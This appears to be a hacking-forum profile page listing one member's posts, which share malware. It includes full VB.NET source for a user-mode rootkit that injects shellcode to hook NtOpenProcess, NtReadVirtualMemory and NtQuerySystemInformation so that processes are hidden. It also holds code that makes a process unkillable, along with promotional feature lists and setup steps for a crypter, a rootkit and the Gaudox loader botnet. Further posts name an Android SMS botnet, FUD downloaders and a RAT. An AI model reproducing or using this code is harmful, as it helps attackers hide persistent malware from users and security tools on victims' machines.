H4ckCoder

LvL-23
  • Content Count

    119
  • Avg. Content Per Day

    0
Community Reputation

2,309 Excellent

About H4ckCoder

  • Rank
    Made in DZ
  • Birthday 03/03/1992


  1. hi, me pass javascript downloader script, this download does work

  2. H4ckCoder

    [Au3] RunTime / ScanTime Crypter by nateko

    Re: [Au3] RunTime / ScanTime Crypter by nateko This is because of XOR encryption :p
  3. H4ckCoder

    Best RAT

    Re: Best RAT NetWire RAT the best, Multi-Platform :)
  4. H4ckCoder

    [Delphi] DH Crypter 1.0 Source

    [+] Key generator for the encryption
    [+] Delay
    [+] File startup
    [+] Hide file
    [+] Melt File
    [+] Fake messages
    [+] Execute commands
    [+] Kill processes
    [+] Open URL
    [+] Download and execute files
    [+] File Pumper, Extension Spoofer & Icon Changer
    [+] Antis: [++] Virtual PC [++] Virtual Box [++] Debug [++] Wireshark [++] OllyDbg [++] Anubis [++] Kaspersky [++] VMware
    [+] Disables: [++] UAC [++] Firewall [++] CMD [++] Run [++] Taskmgr [++] Regedit [++] Updates
    [!] Credits: Doddy Hackman [++] steve10120 [ RunPE ]
  5. H4ckCoder

    VB.NET Ring3 Rootkit

    [HIDE-THANKS] Module VbRootkit '***************** 'CREATOR: Menalix 'SITE: Menalix.com 'If used please give proper credits. '***************** #Region "WinAPI's" Private Declare Function CloseHandle Lib "kernel32" (ByVal pHandle As IntPtr) As Boolean Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Integer, ByVal bInheritHandle As Boolean, ByVal dwProcessId As UInteger) As IntPtr Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByRef lpNumberOfBytesRead As UInteger) As Boolean Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByRef lpNumberOfBytesWritten As UInteger) As Boolean Private Declare Function VirtualProtectEx Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As UInteger, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean Private Declare Function Module32Next Lib "kernel32" (ByVal hSnapshot As IntPtr, ByRef lpme As MODULEENTRY32) As Boolean Private Declare Function Module32First Lib "kernel32" (ByVal hSnapshot As IntPtr, ByRef lpme As MODULEENTRY32) As Boolean Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As UInteger, ByVal u32ProcessId As UInteger) As IntPtr Private Declare Function VirtualAllocEx Lib "kernel32" ( _ ByVal hProcess As IntPtr, _ ByVal lpAddress As IntPtr, _ ByVal dwSize As UInteger, _ ByVal flAllocationType As UInteger, _ ByVal flProtect As UInteger) As IntPtr #End Region #Region "Structures" Structure MODULEENTRY32 Dim U32Size As UInteger Dim Th32ModuleId As UInteger Dim Th32ProcessId As UInteger Dim GlblcntUsage As UInteger Dim ProccntUsage As UInteger Dim ModBaseAddr As IntPtr Dim ModBaseSize As UInteger Dim HModule As IntPtr Dim SzModule As String Dim SzeExePath As String End 
Structure #End Region Sub Main() Console.Title = "Hook Test Application" Console.WriteLine("Press enter, and the hook will be done!") Console.ReadLine() HookApplication("prckiller3") Console.ReadLine() End Sub Private Function ReadMemoryByte(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal nSize As UInteger) As Byte() Dim Buffer(CInt(nSize - 1)) As Byte ReadProcessMemory(hProcess, lpBaseAddress, Buffer, nSize, Nothing) Return Buffer End Function Private Function RemoteGetProcAddressManual(ByVal hProcess As IntPtr, ByVal ModuleAddress As UInteger, ByVal Export As String) As UInteger 'PE Header relative declarations Dim PEHeaderOffset As UInteger = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(ModuleAddress + &H3C, IntPtr), 4), 0) Dim ExportRVA As UInteger = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(ModuleAddress + PEHeaderOffset + &H78, IntPtr), 4), 0) Dim IExportDir() As Byte = ReadMemoryByte(hProcess, CType(ModuleAddress + ExportRVA, IntPtr), 40) Dim NamesCnt As Integer = BitConverter.ToInt32(IExportDir, 24) Dim Names As UInteger = BitConverter.ToUInt32(IExportDir, 32) + ModuleAddress Dim FuncAddress As UInteger = BitConverter.ToUInt32(IExportDir, 28) + ModuleAddress Dim Ordinals As UInteger = BitConverter.ToUInt32(IExportDir, 36) + ModuleAddress 'Empty declarations to use later Dim tpAddress, ApiAddress, Ord As UInteger Dim ApiString As String = Nothing Dim Ptr As IntPtr = Runtime.InteropServices.Marshal.AllocHGlobal(64) 'Searching for the Export For i = 1 To NamesCnt tpAddress = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(Names + ((i - 1) * 4), IntPtr), 4), 0) Runtime.InteropServices.Marshal.Copy(ReadMemoryByte(hProcess, CType(ModuleAddress + tpAddress, IntPtr), 64), 0, Ptr, 64) ApiString = Runtime.InteropServices.Marshal.PtrToStringAnsi(Ptr) Ord = BitConverter.ToInt16(ReadMemoryByte(hProcess, CType(Ordinals + ((i - 1) * 2), IntPtr), 2), 0) ApiAddress = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(FuncAddress + 
(Ord * 4), IntPtr), 4), 0) + ModuleAddress If String.Compare(ApiString, Export, True) = 0 Then Runtime.InteropServices.Marshal.FreeHGlobal(Ptr) Return ApiAddress End If Next Runtime.InteropServices.Marshal.FreeHGlobal(Ptr) Return Nothing End Function Private Function GetModuleBaseAddress(ByVal strProcess As String, ByVal strModule As String) As IntPtr Dim hSnapshot As IntPtr = CreateToolhelp32Snapshot(&H18, CUInt(Diagnostics.Process.GetProcessesByName(strProcess)(0).Id)) If hSnapshot = Nothing Then Return Nothing Dim me32Modules As New MODULEENTRY32 me32Modules.U32Size = CUInt(Runtime.InteropServices.Marshal.SizeOf(me32Modules)) If Module32First(hSnapshot, me32Modules) Then Do If Not me32Modules.ModBaseAddr.ToInt64 > &H7FFFFFFF Then If String.Compare(strModule, me32Modules.SzModule, True) = 0 Then Return me32Modules.ModBaseAddr Else End If Loop While (Module32Next(hSnapshot, me32Modules)) End If Return Nothing End Function Private Function CalculateOffset(ByVal DesAddress As Integer, ByVal SrcAddress As Integer) As Integer Return (DesAddress - SrcAddress) - 5 End Function Sub HookApplication(ByVal ProcessName As String) Const VariablesSize As Integer = 96 Dim ProcessHandle As IntPtr Dim MemoryBlockPtr As UInteger Dim Variables() As Byte = New Byte(VariablesSize) {} Dim fpGetProcessId As UInteger Dim fpGetCurrentProcessId As UInteger Dim lpProtectedAddress(3) As UInteger Dim ProtectedBuffer(3)() As Byte Dim OldProtect As UInteger = Nothing Dim WriteOffset As UInteger = Nothing Dim JmpOpCode() As Byte = {&HE9, Nothing, Nothing, Nothing, Nothing} Dim OpCodes()() As Byte = {NtReadVirtualMemory_AsmOpCode, NtOpenProcess_AsmOpCode, NtQuerySystemInformation_AsmOpCode} Dim OpCodesSize As UInteger = OpCodes(0).Length + OpCodes(1).Length + OpCodes(2).Length 'Alloc memory for our opcode and variables ProcessHandle = OpenProcess(&H8 + &H10 + &H20, False, CUInt(Diagnostics.Process.GetProcessesByName(ProcessName)(0).Id)) MemoryBlockPtr = CInt(VirtualAllocEx(ProcessHandle, 
Nothing, OpCodesSize + VariablesSize, &H3000, &H40)) 'Fill-in variables fpGetProcessId = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetProcessId")) fpGetCurrentProcessId = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetCurrentProcessId")) lpProtectedAddress(0) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtReadVirtualMemory")) lpProtectedAddress(1) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtOpenProcess")) lpProtectedAddress(2) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtQuerySystemInformation")) ProtectedBuffer(0) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), 24) ProtectedBuffer(1) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), 24) ProtectedBuffer(2) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), 24) BitConverter.GetBytes(fpGetProcessId).CopyTo(Variables, 0) BitConverter.GetBytes(fpGetCurrentProcessId).CopyTo(Variables, 4) BitConverter.GetBytes(Diagnostics.Process.GetCurrentProcess.Id).CopyTo(Variables, 8) BitConverter.GetBytes(lpProtectedAddress(0)).CopyTo(Variables, 12) BitConverter.GetBytes(lpProtectedAddress(1)).CopyTo(Variables, 16) BitConverter.GetBytes(lpProtectedAddress(2)).CopyTo(Variables, 20) ProtectedBuffer(0).CopyTo(Variables, 24) ProtectedBuffer(1).CopyTo(Variables, 24 + 24) ProtectedBuffer(2).CopyTo(Variables, 24 + 24 + 24) 'Write variables and opcode to memory block WriteOffset = MemoryBlockPtr WriteProcessMemory(ProcessHandle, WriteOffset, Variables, VariablesSize, Nothing) WriteOffset += VariablesSize For i = 0 To OpCodes.Length - 1 WriteProcessMemory(ProcessHandle, WriteOffset, OpCodes(i), CUInt(OpCodes(i).Length), Nothing) WriteOffset += OpCodes(i).Length Next 'Set memory 
page to execute code VirtualProtectEx(ProcessHandle, MemoryBlockPtr, OpCodesSize + VariablesSize, &H10, 0) 'Hook NtReadVirtualMemory WriteOffset = MemoryBlockPtr + VariablesSize BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(0))).CopyTo(JmpOpCode, 1) VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect) WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing) VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0) 'Hook NtOpenProcess WriteOffset += OpCodes(0).Length BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(1))).CopyTo(JmpOpCode, 1) VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect) WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing) VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0) 'Hook NtQuerySystemInformation WriteOffset += OpCodes(1).Length BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(2))).CopyTo(JmpOpCode, 1) VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect) WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing) VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0) ' clean up CloseHandle(ProcessHandle) End Sub #Region "AsmOpCode" Private NtReadVirtualMemory_AsmOpCode As Byte() = { _ &H55, &H8B, &HEC, &H83, &HEC, &H14, &H56, &HC7, &H45, &HF8, &H1, &H0, &H0, &HC0, &HE8, &H0, _ &H0, &H0, &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HFC, &HFF, &H75, &H18, &HFF, _ &H75, &H14, &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, &H75, &H8, &H8B, &H45, &HFC, &H83, 
&HC0, _ &H18, &HFF, &HD0, &H89, &H45, &HF8, &H83, &H7D, &HF8, &H0, &HF, &H8C, &HA8, &H0, &H0, &H0, _ &HFF, &H75, &H8, &H8B, &H45, &HFC, &HFF, &H10, &H8B, &HF0, &H8B, &H45, &HFC, &HFF, &H50, &H4, _ &H3B, &HF0, &H74, &HA, &H83, &H7D, &H8, &HFF, &HF, &H85, &H8A, &H0, &H0, &H0, &H83, &H65, _ &HF4, &H0, &HEB, &H7, &H8B, &H45, &HF4, &H40, &H89, &H45, &HF4, &H83, &H7D, &HF4, &H3, &H73, _ &H77, &H8B, &H45, &HF4, &H8B, &H4D, &HFC, &H83, &H7C, &H81, &HC, &H0, &H74, &H65, &H8B, &H45, _ &HF4, &H8B, &H4D, &HFC, &H8B, &H44, &H81, &HC, &H3B, &H45, &HC, &H72, &H56, &H8B, &H45, &HC, _ &H3, &H45, &H14, &H8B, &H4D, &HF4, &H8B, &H55, &HFC, &H39, &H44, &H8A, &HC, &H73, &H44, &H8B, _ &H45, &HF4, &H8B, &H4D, &HFC, &H8B, &H44, &H81, &HC, &H2B, &H45, &HC, &H89, &H45, &HF0, &H83, _ &H65, &HEC, &H0, &HEB, &H7, &H8B, &H45, &HEC, &H40, &H89, &H45, &HEC, &H83, &H7D, &HEC, &H18, _ &H73, &H21, &H8B, &H45, &HF4, &H6B, &HC0, &H18, &H8B, &H4D, &HFC, &H8D, &H44, &H1, &H18, &H8B, _ &H4D, &HEC, &H3, &H4D, &HF0, &H8B, &H55, &H10, &H8B, &H75, &HEC, &H8A, &H4, &H30, &H88, &H4, _ &HA, &HEB, &HD2, &HE9, &H7C, &HFF, &HFF, &HFF, &H8B, &H45, &HF8, &H5E, &HC9, &HC2, &H14, &H0} Private NtOpenProcess_AsmOpCode As Byte() = { _ &H55, &H8B, &HEC, &H51, &H51, &HC7, &H45, &HF8, &H1, &H0, &H0, &HC0, &HE8, &H0, &H0, &H0, _ &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HFC, &H83, &H7D, &H14, &H0, &H74, &H16, _ &H8B, &H45, &H14, &H8B, &H4D, &HFC, &H8B, &H0, &H3B, &H41, &H8, &H75, &H9, &HC7, &H45, &HF8, _ &H22, &H0, &H0, &HC0, &HEB, &H17, &HFF, &H75, &H14, &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, _ &H75, &H8, &H8B, &H45, &HFC, &H83, &HC0, &H30, &HFF, &HD0, &H89, &H45, &HF8, &H8B, &H45, &HF8, _ &HC9, &HC2, &H10, &H0} Private NtQuerySystemInformation_AsmOpCode As Byte() = { _ &H55, &H8B, &HEC, &H83, &HEC, &H1C, &H56, &H57, &HC7, &H45, &HEC, &H1, &H0, &H0, &HC0, &HE8, _ &H0, &H0, &H0, &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HF0, &HFF, &H75, &H14, _ &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, &H75, &H8, &H8B, 
&H45, &HF0, &H83, &HC0, &H48, &HFF, _ &HD0, &H89, &H45, &HEC, &H83, &H7D, &HEC, &H0, &HF, &H8C, &H4E, &H1, &H0, &H0, &H83, &H7D, _ &H8, &H5, &H75, &H5D, &H83, &H65, &HF8, &H0, &H8B, &H45, &HC, &H89, &H45, &HF4, &H8B, &H45, _ &HF4, &H83, &H38, &H0, &H74, &H46, &H8B, &H45, &HF4, &H89, &H45, &HF8, &H8B, &H45, &HF8, &H8B, _ &H4D, &HF8, &H3, &H8, &H89, &H4D, &HF4, &H8B, &H45, &HF4, &H8B, &H4D, &HF0, &H8B, &H40, &H44, _ &H3B, &H41, &H8, &H75, &H25, &H8B, &H45, &HF4, &H83, &H38, &H0, &H75, &H8, &H8B, &H45, &HF8, _ &H83, &H20, &H0, &HEB, &HF, &H8B, &H45, &HF8, &H8B, &H0, &H8B, &H4D, &HF4, &H3, &H1, &H8B, _ &H4D, &HF8, &H89, &H1, &H8B, &H45, &HF8, &H89, &H45, &HF4, &HEB, &HB2, &HE9, &HEB, &H0, &H0, _ &H0, &H83, &H7D, &H8, &H10, &HF, &H85, &HE1, &H0, &H0, &H0, &H8B, &H45, &HC, &H89, &H45, _ &HFC, &H83, &H65, &HE8, &H0, &HEB, &H7, &H8B, &H45, &HE8, &H40, &H89, &H45, &HE8, &H8B, &H45, _ &HFC, &H8B, &H4D, &HE8, &H3B, &H8, &HF, &H83, &HC0, &H0, &H0, &H0, &H8B, &H45, &HE8, &HC1, _ &HE0, &H4, &H8B, &H4D, &HFC, &H8B, &H55, &HF0, &H8B, &H44, &H1, &H4, &H3B, &H42, &H8, &HF, _ &H85, &HA2, &H0, &H0, &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &HC6, &H44, _ &H1, &H9, &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &H10, _ &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H33, &HC9, &H8B, &H55, &HFC, &H66, &H89, &H4C, &H2, _ &HA, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &HC, &H0, &H8B, _ &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &HC6, &H44, &H1, &H8, &H0, &H8B, &H45, &HE8, _ &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &H4, &H0, &H8B, &H45, &HE8, &H89, &H45, _ &HE4, &HEB, &H7, &H8B, &H45, &HE4, &H40, &H89, &H45, &HE4, &H8B, &H45, &HFC, &H8B, &H4D, &HE4, _ &H3B, &H8, &H73, &H21, &H8B, &H45, &HE4, &H40, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H8D, &H74, _ &H1, &H4, &H8B, &H45, &HE4, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H8D, &H7C, &H1, &H4, &HA5, _ &HA5, &HA5, &HA5, &HEB, &HCE, &H8B, &H45, &HFC, &H8B, &H0, &H48, &H8B, &H4D, 
&HFC, &H89, &H1, _ &H8B, &H45, &HE8, &H48, &H89, &H45, &HE8, &HE9, &H2B, &HFF, &HFF, &HFF, &H8B, &H45, &HEC, &H5F, _ &H5E, &HC9, &HC2, &H10, &H0} #End Region End Module > [/HIDE-THANKS]
  6. H4ckCoder

    [VB.NET] Unkillable Process

    [HIDE-THANKS] Imports System.Runtime.InteropServices Public Class ProtectMe #Region "VarPtr Support by Francesco Balena & Code Architects" ' ----------------------------------------------------------- ' VARPTR implementation in VB.NET ' Part of VB Migration Partner’s support library ' By Rottweiler ' ----------------------------------------------------------- Private Delegate Function VarPtrCallbackDelegate(ByVal address As Integer, ByVal unused1 As Integer, ByVal unused2 As Integer, ByVal unused3 As Integer) As Integer Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal wndProc As VarPtrCallbackDelegate, ByRef var As Short, _ ByVal unused1 As Integer, ByVal unused2 As Integer, _ ByVal unused3 As Integer) As Integer Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal wndProc As VarPtrCallbackDelegate, ByRef var As Integer, _ ByVal unused1 As Integer, ByVal unused2 As Integer, _ ByVal unused3 As Integer) As Integer Private Shared Function VarPtrCallback(ByVal address As Integer, ByVal unused1 As Integer, ByVal unused2 As Integer, ByVal unused3 As Integer) As Integer Return address End Function Private Shared Function VarPtr(ByRef var As Short) As Integer Return CallWindowProc(AddressOf VarPtrCallback, var, 0, 0, 0) End Function Private Shared Function VarPtr(ByRef var As Integer) As Integer Return CallWindowProc(AddressOf VarPtrCallback, var, 0, 0, 0) End Function #End Region Private Shared Function GetCurrentProcess() As IntPtr End Function Private Shared Function ZwSetInformationProcess(ByVal _1 As IntPtr, ByVal _2 As IntPtr, ByVal _3 As IntPtr, ByVal _4 As IntPtr) As IntPtr End Function Public Shared Sub Protect() ZwSetInformationProcess(GetCurrentProcess(), &H21&, VarPtr(&H8000F129), &H4&) End Sub End Class > [/HIDE-THANKS]
  7. Schwarze Sonne Rootkit

    Coder: Slayer616
    Language: Visual Basic 6/Delphi 7.2
    Credits: Magic Aphex Cobein

    Schwarze Sonne Rootkit was developed to hide and protect your Software securely. You can install important Software Components silently, so the User can't even notice where your Files are stored.

    Functions:
    -modular Multilanguage
    -Profile System
    -Kewl Ribbon GUI *HOT*
    -Hide Processes/Files
    -Protect Processes/Files
    -Block Processes
    -Usermode API Unhook (Bypass Sandboxes, lowgrade AV/FWs) //not included
    -Installation
    -Startup
    -Self Protection
    -cryptable Rootkit! *HOT*
    -XP/Vista compatible!
    -OPENSOURCE::::>Customizable.
  8. Gaudox HTTP

    Gaudox is a HTTP loader completely coded from scratch in C/C++ language with a few lines of Assembly, which means that it does not require any dependencies (C-Runtime, NET Framework, Java VM). The bot has been fully tested and working on all Windows versions from Windows XP SP2 to Windows 10 (32/64-bit). It is also worth mentioning that I coded this bot with very efficient and stable designed code to handle thousands of connections at once.

    Features:

    Usermode Rootkit
    Bot has Rootkit functionality which hides all bot resources and prevents from being accessed from explorer process. This feature does not drop any to disk, the code is internally embedded in the bot file and injected in the target process from memory. It also has self-protection that prevents the hooks from being removed by third-party programs or any security tool. This feature is currently working on 32-bit systems.

    Persistence/Watchdog
    Bot prevents it from being removed from the system by bot killers, security tools or user actions. This feature is currently supporting process protection and working on both 32/64-bit systems but its maximum compatibility is in 32-bit.

    Traffic Encrypted
    The communication between the bot and the control panel is obfuscated. This prevents middle attacks.

    Anti-Analysis/Research
    Bot contains several methods for preventing from being analyzed by researchers or unauthorized users. Some methods are from preventing static analysis by obfuscating code, data up to detect the presence of debuggers, avoid running the bot in virtualized environments, etc. Some methods may not be mentioned.

    Commands:
    [+] Download and execute (Drop&Exec)
    [+] Visit Website (Visible)
    [+] Update Client
    [+] Uninstall Client

    Panel Builder File is Cleaned @CrypterHacker
    pass : 58C1DC678A0B816AAB7E569F70E2E40A

    How to install:
    1) Open the Builder and create a new profile, you will use these values KEY #1 and KEY #2 in the panel.
    2) Create a new database (recommended)
    2) Open setup.php with browser and complete the form.
    3) Delete setup.php and open login.php with browser.
    5) When creating the bot clients do not forget to use the same profile you used to install the panel, otherwise the bots will not connect to the panel.

    Bot
    * Fixed issue with Uninstall command
    * Anti-Virtual machine methods have been enabled
    Panel
    * Fixed issue with location
    * Added captcha in login page
  9. - Ring3 Rootkit
    Includes Rootkit functionality, which hides all of its components from explorer process. Also worth mentioning that the rootkit prevents from being removed from the system and it's not implemented as a separate file so the bot will not write any file to the hard disk. This feature is currently working only in 32-bit versions (XP-8.1).

    - Persistence/Watchdog
    This prevents it from being removed from the system by ensuring that the process is always running on the system. Maximum compatibility of this feature is when the bot runs with administrator privileges.

    - Traffic encrypted
    The communication between the bot and the web panel is now encrypted.

    - Web panel recoded
    The panel has been completely recoded using PDO which makes it safer preventing SQL injection and other attacks.

    Download
    File Cleaned. Analysed for Caballo

    How to install:
    1) Open the builder and create a new profile, you will use these values Key1 and Key2 in the panel.
    2) Create a database
    2) Open setup.php
    3) After installing go to login.php, delete setup.php
    5) When creating the bot clients, do not forget to use the same profile you used to install the panel, otherwise the bots will not connect to the panel.
  10. H4ckCoder

    SmsBot Android Botnet

    File cleaned. Analysed for caballo. Password: opensc.ws
  11. H4ckCoder

    Falcon Downloader Delphi C++

  12. H4ckCoder

    delphi File To Bytestring Converter

  13. H4ckCoder

    vb6 Viotto Binder 1.1 SRC

  14. H4ckCoder

    vb6 Downloader FUD src

  15. H4ckCoder

    AU3 -Rat-simple
